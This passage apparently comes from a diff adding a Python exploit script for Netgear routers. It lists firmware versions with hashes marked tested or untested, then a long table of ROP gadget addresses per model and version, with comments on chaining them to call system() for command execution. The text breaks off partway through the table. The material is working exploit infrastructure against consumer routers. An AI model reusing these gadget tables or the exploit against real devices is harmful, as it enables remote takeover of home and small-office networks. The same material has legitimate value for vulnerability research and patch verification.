2c740bb2e8475e8265d03896eca8fc25 Untested +# WNDR4500 V1.0.1.36_1.0.63 2c7bf148fd493ea4def07e6c1cc23303 Untested +# WNDR4500 V1.0.1.20_1.0.40 5455b061ee711044c5486590cca00ff0 Untested +# WNDR4500 V1.0.1.18_1.0.36 379ff2bad24e59f83198417a7bcd733c Untested +# WNDR4500 V1.0.1.6_1.0.24 30e3aa7b3fab44e518a336d74bfa453e Untested +# WNDR4500 V1.0.0.58_1.0.13 bdb781e3112fa9ffe30d16117ecd701d Untested +# WNDR4500 V1.0.0.50_1.0.12 0162e056eb5d34da63ff8e6d4d73f5a0 Untested +# WNDR4500 V1.0.0.40_1.0.10 48a3028c2e06d22fee5161fba04b260d Untested +# WNDR4500v2 V1.0.0.72_1.0.45 c5f20d0f2cee57993508c0418392e0f3 Tested +# WNDR4500v2 V1.0.0.68_1.0.42 af43fabb4e9ff2e2318d2a36417bd978 Untested +# WNDR4500v2 V1.0.0.64_1.0.40 1d7bc84bb31f20ceaa573e36be1b0857 Untested +# WNDR4500v2 V1.0.0.62_1.0.39 4134d640352f4d577f6185f4c0ebfb4a Untested +# WNDR4500v2 V1.0.0.60_1.0.38 d24a33895a62e79a4f78055520319e45 Tested +# WNDR4500v2 V1.0.0.56_1.0.36 1220bf91d071f907ad2642b550268b9b Untested +# WNDR4500v2 V1.0.0.54_1.0.33 4b1967613a61bc6c2120069ba68a1d5b Untested +# WNDR4500v2 V1.0.0.50_1.0.30 15f6b8ea1aba81531f1c53f68519946f Untested +# WNDR4500v2 V1.0.0.42_1.0.25 544ccf81ef326f62455bdac3159cfc83 Untested +# WNDR4500v2 V1.0.0.36_1.0.21 34ef5af300ef8a2c4528f29a5075610a Untested +# WNDR4500v2 V1.0.0.26_1.0.16 fb9ff113df712a183d6346c620ee87cd Untested +# WNR834Bv2 V2.1.13_2.1.13 2d6331f57ce223c595602c0a90926b0e Untested +# WNR834Bv2 V2.1.13_2.1.13NA c42048a86d1f24036fc03d065381809e Tested +# WNR834Bv2 V2.0.8_2.0.8 6dc2d3a927cee46b2ef538d3ee6d54d9 Untested +# WNR834Bv2 V2.0.8_2.0.8NA f146e01301d76991b6fdc8230ad5fb15 Untested +# WNR834Bv2 V1.0.32_1.0.32 2529e65416073a7ec0f414314517bcea Untested +# WNR834Bv2 V1.0.32_1.0.32NA a7a8fc6ae466ec8cc90dda8253fba107 Untested +# WNR1000v3 V1.0.2.72_60.0.96 d411870b5481c7cd0eb562910ef2c073 Untested +# WNR1000v3 V1.0.2.72_60.0.96NA 295e02ba735bd0af037559d774b9a2db Tested +# WNR1000v3 V1.0.2.68_60.0.93 ff97e01e443cc81bb30f03fc0efe5308 Untested +# WNR1000v3 V1.0.2.68_60.0.93NA 7ba59824dc432a51a535087b0d3ac81e Untested +# WNR1000v3 V1.0.2.62_60.0.87 29f0ec7ed9a0ce791646d81093d0c8e3 Untested +# WNR1000v3 V1.0.2.62_60.0.87NA 245b31c66e707af407846dca4b9b7a8e Untested +# WNR1000v3 V1.0.2.60_60.0.86WW fe9d4fb399ba44f717a2939cd17072ce Untested +# WNR1000v3 V1.0.2.60_60.0.86NA 9cfaf1947bc6d5745faee53495293ff7 Untested +# WNR1000v3 V1.0.2.54_60.0.82 1e268e025b02efcc0bb06c2b4625628b Untested +# WNR1000v3 V1.0.2.54_60.0.82NA 6e10842a669a29f1bfdd76473123d690 Untested +# WNR1000v3 V1.0.2.28_52.0.60 420a11918e1f453f021e230d73406fb6 Untested +# WNR1000v3 V1.0.2.28_52.0.60NA 509a52eb9a78f1ff769b0f0c84ad2b9d Untested +# WNR1000v3 V1.0.2.26_51.0.59 8767f575ddfbd4665d7dd05e42faf079 Untested +# WNR1000v3 V1.0.2.26_51.0.59NA 6692853b230f3af1b690671a27bd059f Untested +# WNR1000v3 V1.0.2.18_47.0.52 1e40904ed44bf26bbfeecbd2c0dec4fe Untested +# WNR1000v3 V1.0.2.18_47.0.52NA f6dafa4be552fe2a5753281a2f80c5ec Untested +# WNR1000v3 V1.0.2.4_39.0.39 ef2240e32d1c7d76ca541c0d329d5a7d Untested +# WNR2000v2 V1.2.0.8_36.0.60 777527ae69d32f5cd0fda49d9987c176 Tested +# WNR2000v2 V1.2.0.8_36.0.60NA 542ecd9c806cbbf4916e01bb89eeb5a8 Untested +# WNR2000v2 V1.2.0.6_36.0.58 6d480f84ab1eda1f1ae3ed86a80e9b59 Untested +# WNR2000v2 V1.2.0.6_36.0.58NA 6d480f84ab1eda1f1ae3ed86a80e9b59 Untested +# WNR2000v2 V1.2.0.4_35.0.57 1e628de1f92428df23cd55dfd223c068 Untested +# WNR2000v2 V1.2.0.4_35.0.57NA 6d1f447d9d84a86f9a08b46f506ff1d9 Tested +# WNR2000v2 V1.0.0.40_32.0.54 043e419fd8c05607ec9e5b4482c95f13 Tested +# WNR2000v2 V1.0.0.40_32.0.54NA 6b55ee8f255f57414338ee05282bdca9 Untested +# WNR2000v2 V1.0.0.35_29.0.47 715eb802324b205e7f56a85d43665f7f Untested +# WNR2000v2 V1.0.0.34_29.0.45 51eaa4d099f0cdb46f633564f62f8497 Untested +# WNR2000v2 V1.0.0.34_29.0.45NA 577a2e81d0dd7d34bee9c63819538f76 Untested +# WNR3500 V1.0.36_8.0.36NA d860aaf29860050a007e633b89664974 Tested +# WNR3500 V1.0.30_8.0.30 1f848e4d7e6703048cf0181824fb609b Untested +# WNR3500 V1.0.29_8.0.29NA 3c1fdb2291946a0a926807695c12628c Untested +# WNR3500 V1.0.22_6.0.22 d8a129dfaea562433cf80be956300b2f Untested +# WNR3500 V1.0.22_6.0.22NA 45a17326c49ac43bcb6b18afb3c0b5f5 Untested +# WNR3500 V1.0.15_1.0.15NA e070997c460f44ab988a04a0efce13bb Untested +# WNR3500 V1.0.10_1.0.10NA 5977786564b864cbf4e42cdd797616ba Untested +# WNR3500v2 V1.2.2.28_25.0.85 e8693f52138f70fa9ada17e963a6afb4 Untested +# WNR3500v2 V1.2.2.28_25.0.85NA bf5336cceb49ac9bb9448e53147f869c Untested +# WNR3500v2 V1.0.2.14_24.0.74 6b443549f93556df02d9e1d9f93b3ce2 Untested +# WNR3500v2 V1.0.2.14_24.0.74NA 386f51b17623cbc359fc3135baf40b0a Untested +# WNR3500v2 V1.0.2.10_23.0.70 46436291f6c3e3d27648d595fef53ae7 Untested +# WNR3500v2 V1.0.2.10_23.0.70NA 3e5c2fc4a6466b601da6187868d93da1 Untested +# WNR3500v2 V1.0.0.64_11.0.51 d0c84ea109ab5acd924a3e89adf530f0 Untested +# WNR3500v2 V1.0.0.64_11.0.51NA 139e55982a1b17e078172bd4f9396abd Untested +# WNR3500L V1.2.2.48_35.0.55NA 94a53de4ee1a4157072b96bedaec92af Tested +# WNR3500L V1.2.2.44_35.0.53 c22b8c6b14d29a9e5610b1db5f516dfb Untested +# WNR3500L V1.2.2.44_35.0.53NA 5e37f509dfa90a0d50532d5a8f58e0e7 Tested +# WNR3500L V1.2.2.40_34.0.48 e5ddafb1962c69c5fed3c7a107bb8f6f Untested +# WNR3500L V1.2.2.40_34.0.48NA 72b02a418f587ff453cf4fd22aff9220 Untested +# WNR3500L V1.2.2.30_34.0.37 70d568a9b4a5a7691d2efc8197fdf7c5 Untested +# WNR3500L V1.2.2.30_34.0.37NA 5a6bd3069dc06833bf48eedd9394404e Untested +# WNR3500L V1.0.2.50_31.1.25 e9931e6dc7e2bd65f8b62609c108439b Tested +# WNR3500L V1.0.2.50_31.1.25NA fe186aa9a4636ad1a5914337f6ca7abf Untested +# WNR3500L V1.0.2.26_30.0.98 517b93770badf97ffec0b86bfda4f023 Untested +# WNR3500L V1.0.2.26_30.0.98NA 27f4a60eccc9d5a444b889abb8711870 Untested +# WNR3500L V1.0.0.88_13.0.76 0df99aa41a37b89bca3b987a89cc8d94 Untested +# WNR3500L V1.0.0.88_13.0.76NA c56d6ec2595a35dc42fb069df34d2446 Untested +# WNR3500L V1.0.0.86_13.0.75 c3408d55c826743cf772599c54b0bf18 Untested +# WNR3500L V1.0.0.86_13.0.75NA 58f6b918e96bd9a55cfa18a3358690cd Untested +# WNR3500Lv2 V1.2.0.56_50.0.96 8ce62e097cc3d1872c7e8d7d08c63ce4 Tested +# WNR3500Lv2 V1.2.0.54_50.0.94 b350794ce4fec6ccf730b811a676bf3d Untested +# WNR3500Lv2 V1.2.0.50_50.0.90 71de09faa64e5a4d6c78a476b57c8f77 Untested +# WNR3500Lv2 V1.2.0.48_40.0.88 78d236e8d0f23db2e2c9645bdfd308ee Untested +# WNR3500Lv2 V1.2.0.46_40.0.86 603d5ce196612709fcd8122b8a09cdaa Untested +# WNR3500Lv2 V1.2.0.44_40.0.84 c745ed78281129c513d5d96471c2f250 Untested +# WNR3500Lv2 V1.2.0.40_40.0.80 d6de6022ff9381fb354c68008858c5ab Untested +# WNR3500Lv2 V1.2.0.38_40.0.78 902b6264511eb4067c8f37c3d2405d38 Untested +# WNR3500Lv2 V1.2.0.34_40.0.75 e5b431877b953c9d5699003af3f5dc8d Untested +# WNR3500Lv2 V1.2.0.32_40.0.74 5d8f4bd2d847ec1f6274546dea54ce02 Untested +# WNR3500Lv2 V1.2.0.28_40.0.72 582fb44d1d46856fdd7168ad4e37514a Untested +# WNR3500Lv2 V1.2.0.26_40.0.71 adbd30a2e76dfb0676f21ff7afcbb76e Untested +# WNR3500Lv2 V1.2.0.20_40.0.68 05f2658e63f0f8e7b32e1c8d945f6834 Untested +# WNR3500Lv2 V1.2.0.18_40.0.67 3a35d7237573c8e21c048dfcc0715039 Untested +# WNR3500Lv2 V1.2.0.16_40.0.66 6b65c8d0cba353d655abc311caa28741 Untested +# WNR3500Lv2 V1.0.0.14_37.0.50 29dba756cc53cbaab1ec11c3a509f0a2 Untested +# WNR3500Lv2 V1.0.0.10 af2d51ddebe58e58aad5309b63eb6c45 Untested +# XR300 V1.0.3.38_10.3.30 e0b2fc5b04cd98e794df05ebac65e596 Untested +# XR300 V1.0.3.34_10.3.27 7e20864385587876e149b9b745568f39 Untested +# XR300 V1.0.3.26_10.3.22 69f1ce725f125e266a27c9419cdb82cc Untested +# XR300 V1.0.2.24_10.3.21 ab533f222aa912f02550ffb59379b728 Untested +# XR300 V1.0.2.18_10.3.15 df58b36f5047a5e6092b91851b46d235 Untested +# XR300 V1.0.1.4_10.1.4 c15de8b9c78405d565b29c5a2a01eda1 Untested +# +import SimpleHTTPServer +import SocketServer +import argparse +import collections +import os +import shutil +import socket +import struct +import sys +import time + +########################################################################### +## Version Info ########################################################### +########################################################################### + +# Gadget addresses used in the exploit. +address_info = { + "AC1450" : { + # 0) gadget: calls system($sp) + "1.0.0.36" : 0x2958c, + "1.0.0.34" : 0x28bd8, + "1.0.0.22" : 0x27cc4, + "1.0.0.14" : 0x27cc4, + "1.0.0.8" : 0x27ca4, + "1.0.0.6" : 0x27ca4, + }, + "D6220" : { + # 0) gadget: calls system($sp+0x18) + "1.0.0.52" : 0x417CF8, + "1.0.0.48" : 0x417CF8, + "1.0.0.46" : 0x417CF8, + "1.0.0.44" : 0x4179B8, + "1.0.0.40" : 0x4179B8, + "1.0.0.36" : 0x417864, + "1.0.0.34" : 0x417864, + "1.0.0.32" : 0x4178D4, + "1.0.0.28" : 0x417804, + "1.0.0.24" : 0x41736C, + "1.0.0.22" : 0x416F54, + "1.0.0.16" : 0x416034, + }, + "D6300" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.102" : [0x44232C, 0x412D40], + "1.0.0.96" : [0x441CFC, 0x412BA8], + "1.0.0.90" : [0x441CFC, 0x412BA8], + "1.0.0.88" : [0x441D2C, 0x412BA8], + "1.0.0.76" : [0x4418BC, 0x412A88], + "1.0.0.72" : [0x440C8C, 0x412748], + "1.0.0.42" : [0x438224, 0x411CB4], + "1.0.0.30" : [0x438224, 0x411CB4], + "1.0.0.24" : [0x437FC4, 0x411C34], + "1.0.0.16" : [0x438024, 0x411BA8], + }, + "D6400" : { + # 0) gadget: calls system($sp+0x18) + "1.0.0.88" : 0x417CA8, + "1.0.0.86" : 0x417CA8, + "1.0.0.82" : 0x417CA8, + "1.0.0.80" : 0x417CA8, + "1.0.0.78" : 0x417968, + "1.0.0.74" : 0x417968, + "1.0.0.70" : 0x417814, + "1.0.0.68" : 0x417814, + "1.0.0.66" : 0x4177B4, + "1.0.0.60" : 0x4176E4, + "1.0.0.58" : 0x4172FC, + "1.0.0.56" : 0x416EF4, + "1.0.0.54" : 0x416764, + "1.0.0.52" : 0x4160C4, + "1.0.0.44" : 0x415FC4, + "1.0.0.38" : 0x434B28, + "1.0.0.34" : 0x433FD8, + "1.0.0.22" : 0x432098, + }, + "D7000V2" : { + # 0) gadget: calls system($sp+0x18) + "1.0.0.56" : 0x41667C, + "1.0.0.53" : 0x41667C, + "1.0.0.52" : 0x41667C, + "1.0.0.51" : 0x41667C, + "1.0.0.47" : 0x41631C, + "1.0.0.45" : 0x41627C, + "1.0.0.44" : 0x41627C, + "1.0.0.40" : 0x41619C, + "1.0.0.38" : 0x415D4C, + }, + "D8500" : { + # 0) gadget: calls system($sp) + "1.0.3.44" : 0x3b3f8, + "1.0.3.43" : 0x3afd0, + "1.0.3.42" : 0x3afd0, + "1.0.3.39" : 0x3ac0c, + "1.0.3.36" : 0x3a9c8, + "1.0.3.35" : 0x3a994, + "1.0.3.28" : 0x3a500, + "1.0.3.27" : 0x3a254, + "1.0.3.25" : 0x39d88, + }, + "DC112A" : { + # 0) gadget: calls system($sp) + "1.0.0.44" : 0x2e3cc, + "1.0.0.30" : 0x2d0e0, + "1.0.0.24" : 0x2d224, + }, + "DGN2200" : { + # 0) set $a0 to $sp+0x1B9 then jumps to $s1 + # 1) calls system without setting $a0 + "1.0.0.58" : [0x44DD40, 0x44BCEC], + "1.0.0.57" : [0x44D3A0, 0x44B360], + "1.0.0.55" : [0x44D300, 0x44B2C0], + "1.0.0.52" : [0x44BEF0, 0x449EB0], + "1.0.0.50NA" : [0x44BA54, 0x449A14], + "1.0.0.36" : [0x449438, 0x447490], + "1.0.0.36NA" : [0x44908C, 0x4470E4], + }, + "DGN2200V4" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.110" : [0x4336D4, 0x407370], + "1.0.0.108" : [0x4331C4, 0x407370], + "1.0.0.102" : [0x432F64, 0x407370], + "1.0.0.98" : [0x432CF4, 0x4072A0], + "1.0.0.90" : [0x432BA4, 0x407280], + "1.0.0.86" : [0x4328A4, 0x407280], + "1.0.0.82" : [0x431E44, 0x407220], + "1.0.0.76" : [0x431954, 0x4071E0], + "1.0.0.66" : [0x431104, 0x41232C], + "1.0.0.62" : [0x431104, 0x41232C], + "1.0.0.58" : [0x431104, 0x41232C], + "1.0.0.46" : [0x431104, 0x41232C], + "1.0.0.24" : [0x42BAE0, 0x412278], + "1.0.0.5" : [0x42B150, 0x411D5C], + }, + "DGN2200M" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.37" : [0x486B70, 0x411F88], + "1.0.0.35" : [0x484560, 0x411EE8], + "1.0.0.35NA" : [0x483F90, 0x411F08], + "1.0.0.33" : [0x483D90, 0x411F34], + "1.0.0.33NA" : [0x483780, 0x411F54], + "1.0.0.26" : [0x474B60, 0x410520], + "1.0.0.24NA" : [0x474350, 0x4104D8], + }, + "DGND3700" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.17" : [0x484EF4, 0x4107DC], + "1.0.0.17NA" : [0x4848F4, 0x4107DC], + "1.0.0.12" : [0x484914, 0x4107BC], + "1.0.0.12NA" : [0x484314, 0x4107BC], + }, + "EX3700" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _init_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.0.78" : [0x61fdf0+0x724, 0x40b680, 0x41d3c4], + "1.0.0.76" : [0x61f1c0+0x724, 0x40b6b8, 0x41d3a4], + "1.0.0.72" : [0x61df20+0x73c, 0x40b8b0, 0x41e064], + "1.0.0.70" : [0x61dcd0+0x740, 0x40b874, 0x41e024], + "1.0.0.68" : [0x621d20+0x734, 0x40b650, 0x41c8d8], + "1.0.0.64" : [0x61e020+0x72c, 0x40b544, 0x41c7c8], + "1.0.0.62" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.58" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.50" : [0x61dcc0+0x72c, 0x40b544, 0x41c618], + "1.0.0.48" : [0x61ecb0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.46" : [0x61df10+0x730, 0x40b684, 0x41ea4c], + "1.0.0.44" : [0x61de40+0x730, 0x40b684, 0x41ea4c], + "1.0.0.34" : [0x61ddb0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.28" : [0x61ddb0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.26" : [0x61d610+0x72c, 0x40b61c, 0x41e9dc], + "1.0.0.24" : [0x61d580+0x72c, 0x40b61c, 0x41e9dc], + "1.0.0.22" : [0x61d440+0x72c, 0x40b61c, 0x41e9dc], + }, + "EX3800" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _init_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.0.78" : [0x61fdf0+0x724, 0x40b680, 0x41d3c4], + "1.0.0.76" : [0x61f1c0+0x724, 0x40b6b8, 0x41d3a4], + "1.0.0.72" : [0x61df20+0x73c, 0x40b8b0, 0x41e064], + "1.0.0.70" : [0x61dcd0+0x740, 0x40b874, 0x41e024], + "1.0.0.68" : [0x621d20+0x734, 0x40b650, 0x41c8d8], + "1.0.0.64" : [0x61e020+0x72c, 0x40b544, 0x41c7c8], + "1.0.0.62" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.58" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.50" : [0x61dcc0+0x72c, 0x40b544, 0x41c618], + "1.0.0.48" : [0x61ecb0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.46" : [0x61df10+0x730, 0x40b684, 0x41ea4c], + "1.0.0.44" : [0x61de40+0x730, 0x40b684, 0x41ea4c], + "1.0.0.34" : [0x61ddb0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.28" : [0x61ddb0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.26" : [0x61d610+0x72c, 0x40b61c, 0x41e9dc], + }, + "EX3920" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _init_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.0.78" : [0x61fdf0+0x724, 0x40b680, 0x41d3c4], + "1.0.0.76" : [0x61f1c0+0x724, 0x40b6b8, 0x41d3a4], + "1.0.0.72" : [0x61df20+0x73c, 0x40b8b0, 0x41e064], + "1.0.0.70" : [0x61dcd0+0x740, 0x40b874, 0x41e024], + "1.0.0.68" : [0x621d20+0x734, 0x40b650, 0x41c8d8], + "1.0.0.64" : [0x61e020+0x72c, 0x40b544, 0x41c7c8], + "1.0.0.62" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.58" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.50" : [0x61dcc0+0x72c, 0x40b544, 0x41c618], + "1.0.0.48" : [0x61ecb0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.46" : [0x61df10+0x730, 0x40b684, 0x41ea4c], + "1.0.0.44" : [0x61de40+0x730, 0x40b684, 0x41ea4c], + "1.0.0.34" : [0x61ddb0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.28" : [0x61ddb0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.26" : [0x61d610+0x72c, 0x40b61c, 0x41e9dc], + }, + "EX6000" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _init_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.0.38" : [0x61fd80+0x724, 0x40b680, 0x41d3c4], + "1.0.0.32" : [0x61deb0+0x73c, 0x40b8b0, 0x41e064], + "1.0.0.30" : [0x61dcd0+0x740, 0x40b874, 0x41e024], + "1.0.0.28" : [0x621d20+0x734, 0x40b650, 0x41c8d8], + "1.0.0.24" : [0x61dfb0+0x72c, 0x40b544, 0x41c7c8], + "1.0.0.20" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.10" : [0x61e000+0x730, 0x40b684, 0x41ea4c], + }, + "EX6100" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _init_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.2.24" : [0x61e590+0x72c, 0x40b5b4, 0x41d0f4], + "1.0.2.18" : [0x6235e0+0x740, 0x40b6a4, 0x41c778], + "1.0.2.16" : [0x6235e0+0x740, 0x40b6a4, 0x41c778], + "1.0.2.6" : [0x6235e0+0x740, 0x40b6a4, 0x41c7a8], + "1.0.1.36" : [0x6225e0+0x740, 0x40b684, 0x41c588], + "1.0.0.28" : [0x5df540+0x700, 0x40aef8, 0x41ffa4], + "1.0.0.22" : [0x5de4f0+0x700, 0x40aedc, 0x41ff60], + }, + "EX6120" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _init_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.0.48" : [0x61fdf0+0x724, 0x40b680, 0x41d3c4], + "1.0.0.46" : [0x61f1d0+0x724, 0x40b6b8, 0x41d3a4], + "1.0.0.42" : [0x61df20+0x73c, 0x40b8b0, 0x41e064], + "1.0.0.40" : [0x61dcd0+0x740, 0x40b874, 0x41e024], + "1.0.0.36" : [0x621d20+0x734, 0x40b650, 0x41c8d8], + "1.0.0.32" : [0x61e020+0x72c, 0x40b544, 0x41c7c8], + "1.0.0.30" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.28" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.26" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.16" : [0x61e4b0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.14" : [0x61dfc0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.8" : [0x61dfc0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.4" : [0x61df60+0x730, 0x40b684, 0x41ea4c], + }, + "EX6130" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _init_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.0.30" : [0x61fdf0+0x724, 0x40b680, 0x41d3c4], + "1.0.0.28" : [0x61f1d0+0x724, 0x40b6b8, 0x41d3a4], + "1.0.0.24" : [0x61df20+0x73c, 0x40b8b0, 0x41e064], + "1.0.0.22" : [0x61dcd0+0x740, 0x40b874, 0x41e024], + "1.0.0.20" : [0x621d20+0x734, 0x40b650, 0x41c8d8], + "1.0.0.16" : [0x61dd20+0x72c, 0x40b544, 0x41c5e8], + "1.0.0.12" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + }, + "EX6150" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _term_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x25, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.0.42" : [0x56ab80+0x2e8, 0x522b40, 0x417748], + "1.0.0.34" : [0x570f00+0x208, 0x522ff0, 0x416b50], + "1.0.0.32" : [0x570d30+0x208, 0x522ff0, 0x416b50], + "1.0.0.28" : [0x570d20+0x208, 0x522ff0, 0x416b50], + "1.0.0.16" : [0x570b90+0x208, 0x522e00, 0x416b50], + "1.0.0.14" : [0x570b00+0x204, 0x522e20, 0x418828], + }, + "EX6200" : { + # 0) gadget: calls system($sp) + "1.0.3.90" : 0x226f8, + "1.0.3.88" : 0x226f8, + "1.0.3.82" : 0x223fc, + "1.0.3.76" : 0x220d0, + "1.0.3.74" : 0x220b0, + "1.0.3.68" : 0x21f50, + "1.0.1.60" : 0x21260, + "1.0.0.52" : 0x20e2c, + "1.0.0.46" : 0x20e2c, + "1.0.0.42" : 0x20e2c, + "1.0.0.38" : 0x20df0, + }, + "EX6920" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _init_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.0.40" : [0x61dcd0+0x740, 0x40b874, 0x41e024], + "1.0.0.36" : [0x621d20+0x734, 0x40b650, 0x41c8d8], + "1.0.0.32" : [0x61e020+0x72c, 0x40b544, 0x41c7c8], + "1.0.0.30" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.28" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.26" : [0x61dd20+0x72c, 0x40b544, 0x41c618], + "1.0.0.16" : [0x61e4b0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.14" : [0x61dfc0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.8" : [0x61dfc0+0x730, 0x40b684, 0x41ea4c], + "1.0.0.4" : [0x61df60+0x730, 0x40b684, 0x41ea4c], + }, + "EX7000" : { + # 0) gadget: calls system($sp) + "1.0.1.84" : 0x26f64, + "1.0.1.80" : 0x26f64, + "1.0.1.78" : 0x26d8c, + "1.0.0.66" : 0x2352c, + "1.0.0.62" : 0x2287c, + "1.0.0.58" : 0x2287c, + "1.0.0.56" : 0x2287c, + "1.0.0.50" : 0x225d4, + "1.0.0.42" : 0x22430, + "1.0.0.38" : 0x22370, + "1.0.0.36" : 0x223bc, + "1.0.0.32" : 0x22bc0, + "1.0.0.30" : 0x22bc0, + }, + "LG2200D" : { + # 0) gadget: calls system($sp+0x78) + "1.0.0.57" : 0x44f90c, + }, + "MBM621" : { + # 0) gadget: calls system($sp+0x18) + "1.1.3" : 0x4126b8, + }, + "MBR624GU" : { + # 0) gadget: calls system($sp) + "6.1.30.64" : 0x19728, + "6.1.30.61" : 0x19680, + "6.1.30.59" : 0x19680, + "6.1.30.59NA" : 0x19394, + "6.0.30.46" : 0x196ac, + "6.0.28.43" : 0x1932c, + "6.0.28.43NA" : 0x19618, + "6.0.26.21" : 0x1897c, + "6.0.22.14NA" : 0x18190, + "6.0.22.12" : 0x18190, + }, + "MBR1200" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.2.2.53" : [0x4711C0, 0x40CDD0], + }, + "MBR1515" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.2.2.68" : [0x48CFE0, 0x412A38], + }, + "MBR1516" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.2.2.84BM" : [0x48A210, 0x412534], + }, + "MBRN3000" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.74" : [0x462750, 0x40CB10], + "1.0.0.72" : [0x4602A0, 0x40CA20], + "1.0.0.72NA" : [0x45FF40, 0x40CA40], + "1.0.0.69" : [0x45FB80, 0x40CA68], + "1.0.0.69NA" : [0x45F7F0, 0x40CA98], + "1.0.0.65" : [0x45FA30, 0x40CA38], + "1.0.0.65NA" : [0x45F6B0, 0x40CA78], + "1.0.0.43NA" : [0x45BE74, 0x40C34C], + }, + "MVBR1210C" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.2.0.35" : [0x48AA20, 0x41113C], + }, + "R4500" : { + # 0) gadget: calls system($sp+0x78) + "1.0.0.4" : 0x4430dc, + }, + "R6200" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.1.58" : [0x43DBA8, 0x41A4EC], + "1.0.1.56" : [0x43DB58, 0x41A4EC], + "1.0.1.52" : [0x43DB58, 0x41A4EC], + "1.0.1.48" : [0x43D028, 0x41A2AC], + "1.0.1.46" : [0x43CEB8, 0x41A0DC], + "1.0.0.28" : [0x43B808, 0x419598], + "1.0.0.18" : [0x43AD90, 0x418BC8], + }, + "R6200V2" : { + # 0) gadget: 